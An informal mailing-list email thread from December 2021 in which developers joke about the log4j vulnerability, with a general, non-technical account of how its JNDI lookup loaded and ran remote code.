I chuckled when I saw this again the other day: [cid:[email protected]]
If only it wasn't true. Regards, Greg Dr Greg Low 1300SQLSQL (1300 775 775) office | +61 419201410 mobile SQL Down Under | Web: https://sqldownunder.com<https://sqldownunder.com/> |About me: https://greglow.me From: [email protected] <[email protected]> On Behalf Of Greg Keogh Sent: Thursday, 16 December 2021 6:00 PM To: ozDotNet <[email protected]> Subject: [OT] log4j Internet Doom It's almost Friday ... Many of you might have read the blazing headlines everywhere that the whole Internet is about to crash because of a security vulnerability in log4j. I haven't written Java since early 2001, so I went looking for tech details. It turns out someone wrote an appender (in our log4net terms) that parsed a Uri out of a special bit of syntax, then blindly loaded and ran what was at the Uri. I mean, what could possibly go wrong? I think that this guilty JNDI appender is available by default, that is, it's in the JAR or something like that (I can't get further fine details on that). So it's a bit like Aircrash Investigations where it takes multiple things to go wrong and make a bigger wrong. Who could have imagined that a logging library would bring the Internet down?! Greg
